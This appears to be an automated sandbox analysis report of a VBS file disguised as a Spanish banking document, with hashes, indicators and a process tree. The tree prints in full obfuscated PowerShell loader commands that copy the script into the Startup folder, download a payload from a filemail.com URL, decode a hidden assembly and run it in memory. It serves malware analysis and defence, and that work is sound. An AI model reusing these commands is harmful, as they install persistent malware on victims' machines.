Analysis
-
max time kernel
121s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 19:42
Static task
static1
Behavioral task
behavioral1
Sample
DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919.vbs
Resource
win7-20241010-en
General
-
Target
DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919.vbs
-
Size
12KB
-
MD5
8825e4591cadaec1fb1d0082f84c2398
-
SHA1
39fca0a522686f7b9b2b9dc5e5874aebcf231159
-
SHA256
61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
-
SHA512
d5b9c70136aaef8ca9aa1dfb32225632b69de90310ba4f9dcf35567ed58cfd6da8a6fbede4714a19ff41310af0e04bc54c7c6a95060840918efc5a31893fa2c9
-
SSDEEP
96:J86ymyaynXnLbv+mfupmtsgOgjAC9LFgtYif8fTFsgH2vX5bUdnL7vcumuZ4Y5Wx:JttRS/GpqDzj1eUhDH2Rb8RX1GHRkfkx
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 1488 WScript.exe 4 1488 WScript.exe 8 2640 powershell.exe 9 2640 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2856 powershell.exe 2640 powershell.exe 2748 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 944 cmd.exe 2336 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2336 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2748 powershell.exe 2856 powershell.exe 2640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1488 wrote to memory of 944 1488 WScript.exe 31 PID 1488 wrote to memory of 944 1488 WScript.exe 31 PID 1488 wrote to memory of 944 1488 WScript.exe 31 PID 944 wrote to memory of 2336 944 cmd.exe 33 PID 944 wrote to memory of 2336 944 cmd.exe 33 PID 944 wrote to memory of 2336 944 cmd.exe 33 PID 944 wrote to memory of 2748 944 cmd.exe 34 PID 944 wrote to memory of 2748 944 cmd.exe 34 PID 944 wrote to memory of 2748 944 cmd.exe 34 PID 1488 wrote to memory of 2856 1488 WScript.exe 35 PID 1488 wrote to memory of 2856 1488 WScript.exe 35 PID 1488 wrote to memory of 2856 1488 WScript.exe 35 PID 2856 wrote to memory of 2640 2856 powershell.exe 37 PID 2856 wrote to memory of 2640 2856 powershell.exe 37 PID 2856 wrote to memory of 2640 2856 powershell.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919.vbs"1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58d28952d655745c4fdd4abaf040d3611
SHA129dac09fa1699e180b5f320b125d5d348c672fa3
SHA2569abd2e40873f08ff71088404aec5779876b6b26aee0d558556097b750870f5f3
SHA512ed7ac79cc3df7d967204b2aed9ad3adc625eb9d0c91517f0e04b85c4f3893241fce1b4a9937590e392662ac8032594539af8380dc6328eaebd7582c4e9a8e9f3